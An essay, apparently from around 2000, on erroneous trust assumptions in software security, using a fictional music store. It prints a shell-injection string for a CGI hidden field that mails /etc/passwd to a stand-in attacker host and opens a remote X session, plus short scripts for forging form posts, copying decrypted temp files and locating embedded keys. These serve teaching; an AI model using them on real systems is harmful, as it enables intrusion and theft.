
Trust (and Mistrust) in Secure Applications

Exploring and considering trust assumptions during every stage of software development.
  1. Introduction
  2. The Origins of Erroneous Trust Assumptions
  3. Trust in an Evolving Infrastructure
  4. Trusting User Input
  5. Trusting the Client Application
  6. Trusting the Execution Environment
  7. Advice
  8. References
  9. Authors
  10. Figures

Trust and trustworthiness are the foundations of security. Homeowners trust lock manufacturers to create quality locks to protect their homes. Some locks are trustworthy; others are not. Businesses trust security guards to admit only authorized personnel into sensitive areas. Some security guards should be trusted; some should not. CGI programmers trust users to provide valid inputs to the data fields on Web pages. Although most users can be trusted, some cannot. The basis for these trust relationships and how they are formed can dramatically affect the underlying security of any system—be it home protection or online privacy.

Because these trust assumptions are often elusive, software development efforts seldom handle them correctly. Here we explore several common ways in which erroneous trust assumptions can wreak havoc on the security of software applications. We consider the common trust assumptions and why they are often wrong, how these assumptions arise during an application’s development process, and how to minimize the number of problematic trust assumptions in an application.

A trust relationship is a relationship involving multiple entities (such as companies, people, or software components). Entities in a relationship trust each other to have or not have certain properties (the so-called trust assumptions). If the trusted entities satisfy these properties, then they are trustworthy. Unfortunately, because these properties are seldom explicitly defined, misguided trust relationships in software applications are not uncommon.

Software developers have trust relationships during every stage of software development. Before a software project is conceived, there are business and personal trust relationships that developers generally assume will not be abused. For example, many corporations trust that their employees will not attack the information systems of the company. Because of this trust, a company might have a software application talking to a database over the company’s network without the aid of encryption and authentication. Employees could easily abuse the lack of security to convince database applications to run phony updates. Companies usually trust their software developers and assume their developers will not leave back doors or other artifacts in their code that could potentially compromise the security of the system.

System architects must constantly deal with trust issues during an application’s design cycle. Proprietary design documents and other data are often communicated over channels that should not be trusted (such as the Internet); the developer must weigh his or her trust in the people who might have access to this data, along with the potential consequences of those people abusing that trust.


Often, designers make trust decisions without realizing that trust is actually an issue. For example, it is common for a client application to establish an encrypted session with an application server using a hard-coded symmetric cryptographic key embedded in the client binary. In such a situation, many developers fail to realize they are implicitly trusting users (and potential attackers) not to reverse-engineer the software.
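To make the danger concrete, consider a minimal sketch of this anti-pattern, assuming Python and the third-party cryptography package; the function name and key value are invented for illustration. Because the same constant ships in every copy of the client, anyone who pulls it out of the distributed binary can decrypt, and forge, every session.

    import base64
    from cryptography.fernet import Fernet

    # The "secret" is a constant compiled into every copy of the client.
    HARD_CODED_KEY = base64.urlsafe_b64encode(b"sixteen byte key" * 2)

    def protect(message: bytes) -> bytes:
        """Encrypt a message for the application server with the embedded key."""
        return Fernet(HARD_CODED_KEY).encrypt(message)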

Once the implementation phase begins, developers may make similarly blind assumptions about the validity of input to deployed code or about the environment in which that code runs. For example, programmers sometimes assume the inputs to their programs have certain formats and lengths. When these assumptions are not satisfied, an attacker may be able to mount an attack known as a buffer overflow.

Many software developers either misunderstand trust or completely ignore trust issues. Too often developers look at trust in the small scope of the component they are writing, not in the system as a whole. For example, a company may assume that because a critical component uses cryptography, the component is inherently secure. Such companies ignore the fact that although a given component may be secure by itself, it may have implicit trust relationships with other, potentially subvertible, components.

Ultimately, if developers overestimate or misjudge the trustworthiness of other components in the system, the deployment environment, or peering organizations, then the underlying security architecture may be inadequate.

Back to Top

The Origins of Erroneous Trust Assumptions

Erroneous trust assumptions can be made at any point in the software development process. However, in most projects, dangerous trust assumptions come from two major areas: incomplete requirements and miscommunication between development groups.

When a development team creates requirements, that team typically tends to concentrate on the functionality of the software and on requirements dictated from outside the software itself. “The program must implement a preexisting protocol” and “management wants us to use Oracle” are classic examples. Development teams historically ignore security requirements. Even if security requirements are discussed, the discussions are often very naïve in nature. Because most developers are not trained in general security theory, problem areas are seldom addressed properly. Encryption and passwords are wielded like swords that make software seemingly “secure.”

These measures are not enough. Unless all the entities in a software system, and the trust relationships among them, are identified during the requirements phase, the project is doomed from the start. Modern software packages have many required interfaces, both public and private. A development team must understand who will use these interfaces and what those users can be trusted to do (or not do). As little trust as possible should be placed in external components. Distrust of the end user, the underlying operating system, and the network should be stated explicitly as requirements. The software under development must be written to handle malicious activity from any and all entities.

Once the requirements phase is over, there is still danger for the development teams. As the length of software development projects shortens, inter-developer communication suffers. Dot-com companies turn out software at phenomenal rates. If these companies take “too long,” a competitor may beat them to market and destroy their potential market share. Unfortunately, as these development cycles shorten, conventional software development models fall apart. Development now occurs in an ad hoc fashion, with code reviews falling by the wayside and communication among developers breaking down.

This lack of communication causes developers to make assumptions about the implementation. Without a clear division of tasks, a development group may assume another group is handling the security of a component when in reality security is never codified. Because of poor communication, developers may not have precise knowledge about the environment in which their code will run. This may lull developers into a false sense of security. If developers believe a component will run in a trusted environment, they may not utilize proper secure coding practices.

Back to Top

Trust in an Evolving Infrastructure

The dynamic dot-com economy is driven by money and politics. Business partnerships are based primarily on what each player brings to the table, not on the underlying security architectures of each company’s software. Partnerships form and mergers are established without regard to how all the technical pieces fit together. Developers and administrators are left to put everything together, usually in a highly compressed time frame.

When these partnerships are created, new trust relationships are formed. The trust relationships resulting from the partnership may not have been accounted for in the original software design. As an example, consider the customer service systems of the partnering companies. While giving a newfound business partner unfettered access to customer service software may seem like a safe thing to do, there may be unforeseen security implications. The initial software requirements may have assumed that only employees would have access and that network protections such as a firewall would prevent anyone outside the company from accessing the application. But granting access to a partner company changes this requirement. Unless the software changes, the original company ends up trusting its partner’s employees just as it trusts its own. Such trust could result in security violations. Consider, for example, a scenario in which the customer service software is trusted by another, more sensitive system such as an accounting database. Even though the company has not explicitly given access to the accounting database, people outside the company can now browse customer billing information or other sensitive data.

Sometimes companies discover these gaping holes in their new trust model and try to patch the problems quickly and in an ad hoc manner. Unfortunately, patching does not always work. If the new trust model fundamentally changes the software system’s requirements, a completely new development effort may be necessary.

This scenario is more common than many would think. The face of business changes at a much faster rate than it did even a few years ago. Evolving partnerships and relationships can change trust models on almost a monthly basis. This can overburden everyone involved, leading to complacency. For many companies, there is no hope of patching the problem; their systems must be redesigned from scratch.

Back to Top

Trusting User Input

Writing secure code is an incredibly difficult task. This should come as no surprise, as programming is an extraordinarily complex activity in which many things can go wrong. Programmers are generally not expected to be security experts; while they are likely to understand basic risks and will often add encryption to their software, they frequently do not understand the subtle ways in which security risks can be accidentally introduced into code.

The most important example of this nature is the buffer overflow, which accounts for over 50% of reported software security vulnerabilities in the past few years [4]. This problem is widespread largely because it is extremely easy for even good programmers to accidentally introduce buffer overflow vulnerabilities into their code. For example, it is quite common for programmers to accidentally misuse standard library routines in ways that make them susceptible to buffer overflow attacks.

Buffer overflows are limited to languages without array bounds checking; C and C++ are particularly problematic. In these languages, a buffer overflow occurs when more data is placed into an array than the array was designed to hold; the extra data is still written to memory, spilling into whatever happens to be stored adjacent to the array. Buffer overflows are often treated as a reliability problem, because an overflow frequently results in a program crash. However, carefully crafted inputs can sometimes allow an attacker to change security-critical data or to run arbitrary code in place of the program that was expected to run.

In addition to buffer overflows, there are other common input validation problems that have major security implications. For example, although CGI programs usually take inputs from a user through a forms interface, they can take additional input from the client side. Often, important data is stored in hidden HTML fields, such as in the following example:

    <form action=http://www.list.org/viega-cgi/send-mail.py method=post>
      <h3>Edit Message:</h3>
      <textarea name=contents cols=80 rows=10>
      </textarea>
      <input type=hidden name=to value=viega@list.org>
      <input type=submit value=Submit>
    </form>

This HTML form provides a text area for input and a submit button. However, it also has a “hidden” field, which passes an email address to the called CGI script, but does not show up in the browser display. That way, the HTML form could be modified to send mail to other users without requiring a different script. Tampering with this HTML page is certainly possible; anyone can copy the HTML code and modify the hidden parameter.
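In fact, an attacker need not even edit the HTML; the form is simply an HTTP POST that anyone can reproduce directly. The following sketch, which assumes Python’s standard urllib module, submits the same fields with an attacker-chosen value in place of the hidden one (the request itself is commented out here):

    from urllib import parse, request

    fields = {
        "contents": "any message body",
        "to": "someone-else@example.org",  # attacker-chosen value for the hidden field
    }
    req = request.Request(
        "http://www.list.org/viega-cgi/send-mail.py",
        data=parse.urlencode(fields).encode(),
        method="POST",
    )
    # request.urlopen(req)  # submits the "form" without ever loading the page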

Developers must realize that hidden parameters can be modified maliciously and are therefore untrustworthy. For example, if the hidden field were directly passed to a shell to send mail, then an attacker could submit an email address with escape characters for the shell, along with an arbitrary command. That is, if the invoked CGI script runs on a Unix machine and contains the call:

    system("/bin/mail " + address + " < tmpfile")

the attacker could send the following string:

    attacker@attacker.org < /etc/passwd; export DISPLAY=attacker.com:0;xterm& #

After substitution, the machine would run the command:

    system("/bin/mail attacker@attacker.org < /etc/passwd; export DISPLAY=attacker.com:0;xterm& # < tmpfile")

This command would mail the attacker the password database on the remote server and then give the attacker an interactive session on the remote machine.

It is easy to use functions like “system” without understanding the security implications. In this case, the programmer implicitly trusts users without realizing the consequences, and those consequences can be extremely dangerous. For example, in February 2000, Internet Security Systems released a study exposing hidden input vulnerabilities in 11 different commercial shopping cart applications [3].
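A safer handler refuses to pass user input through a shell at all. The following sketch, a hypothetical rewrite rather than the actual send-mail.py, assumes Python: the address must match a conservative pattern, and /bin/mail is invoked directly with an argument list, so shell metacharacters in the input are never interpreted.

    import re
    import subprocess

    ADDRESS_RE = re.compile(r"^[A-Za-z0-9._+-]+@[A-Za-z0-9.-]+$")

    def send_mail(address, body_path="tmpfile"):
        if not ADDRESS_RE.fullmatch(address):
            raise ValueError("rejecting suspicious address")
        with open(body_path, "rb") as body:
            # No shell is involved; the address is passed verbatim as one argument.
            subprocess.run(["/bin/mail", address], stdin=body, check=True)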

The same sorts of modifications that can be made to hidden fields can be made to cookies stored in a user’s browser. Persistent cookies are easy to modify because they are stored on the user’s disk. Temporary cookies, although held only in the browser’s memory, can also be changed by a skilled attacker.

A key problem is that developers often do not anticipate malicious misuse of their applications. For example, using a cookie to store a user identification token is common and allows a Web site to “remember” visitors between sessions. However, it rarely occurs to developers that a user might try to modify his or her cookies in order to log in as another user. Unfortunately, cookie modification can result in a serious attack. For example, at e-commerce sites, logging in as another user would often allow an attacker to spend money using someone else’s credit card. The point is that although developers often trust a client’s cookies, those cookies may be unworthy of such trust.
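Servers can at least make cookie tampering detectable by accompanying each value with a keyed message authentication code. A minimal sketch, assuming Python’s standard hmac and hashlib modules and a made-up server-side secret and cookie format:

    import hmac
    import hashlib

    SECRET_KEY = b"server-side secret the client never sees"

    def make_cookie(user_id):
        sig = hmac.new(SECRET_KEY, user_id.encode(), hashlib.sha256).hexdigest()
        return user_id + "." + sig

    def read_cookie(cookie):
        user_id, _, sig = cookie.rpartition(".")
        expected = hmac.new(SECRET_KEY, user_id.encode(), hashlib.sha256).hexdigest()
        # Constant-time comparison; a modified user_id fails verification.
        return user_id if hmac.compare_digest(sig, expected) else None

Note this only detects modification; a stolen cookie still identifies its original owner, so it is no substitute for protecting the cookie in transit and at rest.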

This kind of trust issue is common in all applications and is not limited to CGI or buffer overflow problems. For example, we have often seen scenarios in which a client contains embedded SQL code that it sends to a remote server for execution. In these cases, a malicious client could be written to send arbitrary SQL code. Another example is the common practice of using DNS addresses or IP addresses associated with a network connection as proof of identity. However, this kind of information can usually be faked.
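The usual remedy for the SQL case is to keep query text on the server and let the client supply only values, which the server binds as parameters. A sketch assuming Python’s built-in sqlite3 module and a hypothetical purchases table:

    import sqlite3

    def purchases_for(conn, customer_id):
        # The client never supplies SQL text, only the value bound to "?".
        cur = conn.execute(
            "SELECT title, purchased_at FROM purchases WHERE customer_id = ?",
            (customer_id,),
        )
        return cur.fetchall()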

Back to Top

Trusting the Client Application

In this section we use a fictitious company, Bob’s Music Warehouse, as a vehicle to discuss how a system can fail to meet its security goals when the implicit trust placed in a client application turns out to be unwarranted.

Bob’s Music Warehouse provides a novel way of selling music over the Internet. Bob’s Music Warehouse consists of several components: a Web browser, a client application, a front-end server, a content database, and a credit card transaction server (see the figure). Although Bob’s Music Warehouse is imaginary, its architecture is similar to many real-world systems.

The Web browser runs on users’ computers. Users can access the front-end server and purchase music titles with the browser. The browser communicates with the front-end server by using cryptography.

The client application also runs on the users’ computers. Users use the client application to play their purchased titles. In order to prevent a user from making illegal copies of purchased music, the purchased titles remain encrypted on the users’ computers. Only the client application can decrypt and load the purchased titles. Furthermore, in order to prevent a user from giving his or her encrypted titles to a friend who also owns a copy of the client application, the purchased titles are cryptographically bound to the purchaser’s identity (see [1] for a discussion on how this can be done).
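Reference [1] discusses how such a binding can be built. As a rough illustration of the idea only (not the scheme in [1]), the front-end server might derive a per-purchaser, per-title content key from a master secret, hand that key only to the purchaser’s client, and encrypt the downloaded title under it; the sketch below assumes Python’s standard hmac and hashlib modules and invented names.

    import hmac
    import hashlib

    MASTER_SECRET = b"warehouse master secret (hypothetical)"

    def title_key(purchaser_id, title_id):
        """Derive the content key for one purchaser and one title."""
        material = (purchaser_id + ":" + title_id).encode()
        return hmac.new(MASTER_SECRET, material, hashlib.sha256).digest()

    # The title is then encrypted under title_key(...) with an authenticated
    # cipher before download; a copy passed to a friend decrypts only with a
    # key that the friend cannot obtain.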

The front-end server provides the primary logic for Bob’s Music Warehouse. The front-end server acts as the gateway between the client applications, the content database, and the credit card transaction server. It uses cryptography to communicate with the various components.

The content databases contain the actual music titles for purchase. The content databases may be owned by Bob’s Music Warehouse or may be owned by a partnering organization. The credit card transaction server handles the credit card transactions for Bob’s Music Warehouse.

Since the client application is responsible for loading and decrypting the contents of a song purchased by the user, the client application is instrumental in enforcing the security requirements of Bob’s Music Warehouse. That is, the client application functions as a “window” into the encrypted title’s contents. Since only the client is supposed to be able to decrypt the purchased contents, a user should only be able to access purchased songs through the client application.

Now let us consider what could happen when a client application does not satisfy the Music Warehouse’s trust assumptions. First and foremost, Bob’s Music Warehouse trusts the client application to not only do what it is supposed to do (play the purchased titles), but to not do what it is not supposed to do. For example, Bob’s Music Warehouse assumes that the client application will not simply write the decrypted songs to the user’s hard drive. This is an obvious assumption, for if it were not true, a malicious user could simply distribute pirated copies of the decrypted songs to countless other users.

Unfortunately, trust assumptions seldom hold in real life. What seems obvious when thinking about security may seem counterintuitive at implementation time. For example, the developers may decide to store audio in a temporary file while a song is open in the client application, because keeping entire decrypted songs in memory would hurt performance. This decision violates the security requirement, but it may go unnoticed because it seems like a natural thing to do. Developers are unlikely to see the security implications immediately, since they expect the end user to have no direct interaction with the temporary file at all. However, an attacker could easily learn about the temporary files and copy them whenever they are written.
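How little effort that takes is worth spelling out. The following sketch assumes Python and a made-up cache directory; a few lines of polling are enough to copy each decrypted file the moment it appears.

    import os
    import shutil
    import time

    WATCHED = "/tmp/bmw-cache"                  # hypothetical client cache directory
    LOOT = os.path.expanduser("~/copied-songs")

    os.makedirs(LOOT, exist_ok=True)
    seen = set()
    while True:
        if os.path.isdir(WATCHED):
            for name in os.listdir(WATCHED):
                if name not in seen:
                    shutil.copy(os.path.join(WATCHED, name), LOOT)
                    seen.add(name)
        time.sleep(0.5)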

Another common assumption is that a legitimate external component will handle its data correctly. This is particularly important when different parties develop different components in a system. Consider the relationship between the front-end server and the third-party contents databases. The third-party music providers assume the front-end server will actually encrypt the songs before the songs are sent to the end user. Unfortunately, however, since the third-party content providers do not have any direct control over the Music Warehouse front-end server, the music providers have no guarantee their music will be encrypted.

Similarly, consider a situation in which Bob’s Music Warehouse and Alice’s Music Warehouse both produce compatible products. That is, Bob’s client application can work with Alice’s front-end server and vice versa. Both Alice and Bob must assume each other’s client application will not leak information about the contents of the purchased songs.

Ultimately, distributed systems rely on many different components, and it is often impossible to ensure that all of those components are legitimate and will correctly perform their intended operations. Consequently, it is very important to minimize (or eliminate) the trust assumptions between the various components in a multiparty system.

Back to Top

Trusting the Execution Environment

Many application developers make assumptions about the environment in which their application will execute. In particular, application providers often assume their code will execute in a non-hostile environment. Building off this assumption, many software developers embed secrets into their executable code. For example, Bob’s Music Warehouse application developers hard-coded the cryptographic key used to decrypt purchased songs into the client application itself. Since Bob’s Music Warehouse trusts the environment in which the client application will execute, Bob’s Music Warehouse assumes no attacker will be able to recover the secret key hidden in the client application.

The problem with this type of embedding procedure is that although a normal user would not be able to extract the cryptographic key from the client application, a skilled cracker would.

If the key is simply stored in the executable file, a cracker might scan the executable looking for portions of data that appear uncharacteristically random. A slightly more sophisticated attacker could use a debugger to extract the secret key from the client application. To do this, the attacker would run the client application in a debugger. The debugger would enable the attacker to monitor the exact operations the program performs. In this way, the attacker would be able to monitor the client application as it decrypts the purchased songs and, therefore, reconstruct the client application’s decryption algorithm and secret key.
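The first of these attacks is simpler than it may sound. The sketch below assumes Python and an invented binary name; the window size and entropy threshold are arbitrary illustrative choices. It slides a window across the file and reports regions whose byte entropy is uncharacteristically high, which is exactly how embedded key material tends to stand out.

    import math
    from collections import Counter

    def entropy(window):
        counts = Counter(window)
        total = len(window)
        return -sum(c / total * math.log2(c / total) for c in counts.values())

    def suspicious_regions(path, window=64, threshold=5.5):
        data = open(path, "rb").read()
        for offset in range(0, len(data) - window, window):
            if entropy(data[offset:offset + window]) > threshold:
                yield offset  # candidate location of key material

    for offset in suspicious_regions("client.exe"):
        print("high-entropy data at offset", hex(offset))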

Some application developers realize that a malicious user might be able to run their applications in a hostile environment in order to mount one of the previous attacks. Consequently, many application developers attempt to obfuscate their code. Code obfuscation involves modifying the code in such a way that an attacker will not be able to understand its inner workings [2]. Although code obfuscation can impede a cracker’s efforts to recover information from an executable, it is in no way perfect; at some point the obfuscated code must be transformed into code the executing environment can understand. If an attacker controls the application’s executing environment and can monitor the execution of the program, the attacker will be able to determine the secrets embedded in the obfuscated code.
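A toy example, assuming Python, shows why. Suppose the key is stored XOR-masked so it never appears verbatim in the shipped file; the unmasking routine must still run whenever a song is decrypted, and an attacker stepping through it in a debugger sees the plaintext key.

    MASK = 0x5A
    MASKED_KEY = bytes(b ^ MASK for b in b"sixteen byte key")  # stored form

    def real_key():
        # Obfuscation only hides the constant at rest; it is reconstructed here,
        # in full view of anyone who controls the execution environment.
        return bytes(b ^ MASK for b in MASKED_KEY)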

There are other attacks one could perform against an application that trusts its executing environment. Consider, for example, the Bob’s Music Warehouse client application. The application plays purchased songs on users’ computers. Suppose an attacker monitors the communications between the client application and the computer’s sound system. If an attacker is able to do this, then he or she will be able to make illegal copies of the purchased titles.

At some point, an application must trust the environment in which it executes. However, in order to increase one’s confidence in the security of the application, the application should minimize the amount of trust it places in its execution environment.

Back to Top

Advice

Trust-related problems in applications arise from assumptions made, and requirements left unstated, during the applications’ design and implementation phases. They can also result from miscommunication between development groups or from excessively rapid development. In order to create secure applications, trust relationships must be carefully and directly addressed.

During the design phase, all entities involved in a system must be identified. Once they are properly documented, the trust relationships between the entities must be formalized. These trust relationships will map directly into system requirements that will later be codified during implementation. Whenever the entities change, perhaps when companies form new partnerships, the trust relationships must be reexamined. If the new relationships cause a shift in trust, new requirements must be drafted. A decision must then be made as to whether the current system can be patched or whether the system should be completely rearchitected and reimplemented.

The code should be reviewed, either by hand or by automated tools, to ensure it is not placing too much trust in user input. While there is no method to guarantee that a program is immune to buffer overflow and other input-related attacks, a thorough review process can help eliminate problems resulting from malicious user input.

Although there is no complete solution to the problem of erroneous trust relationships, application developers who understand where trust relationships can go wrong will be able to produce better, more secure software systems and applications.

Back to Top

Figures

Figure. Pictorial overview of Bob’s Music Warehouse architecture.

Back to Top

References

    1. Adams, C. and Zuccherato, R. A global PMI for electronic content distribution. In Seventh Annual Workshop on Selected Areas in Cryptography. Workshop Record, Aug. 2000. Springer-Verlag, to appear.

    2. Collberg, C., Thomborson, C. and Low, D. A taxonomy of obfuscating transformations. Technical Report 148, Department of Computer Science, University of Auckland, New Zealand, Jul. 1997; ftp.cs.auckland.ac.nz/out/techreports/.

    3. Internet Security Systems. Form tampering vulnerabilities in several Web-based shopping cart applications; xforce.iss.net/alerts/advise42.php, Feb. 2000.

    4. Wagner, D., Foster, J.S., Brewer, E.A. and Aiken, A. A first step towards automated detection of buffer overrun vulnerabilities. In Network and Distributed Systems Security Symposium, Feb. 2000.
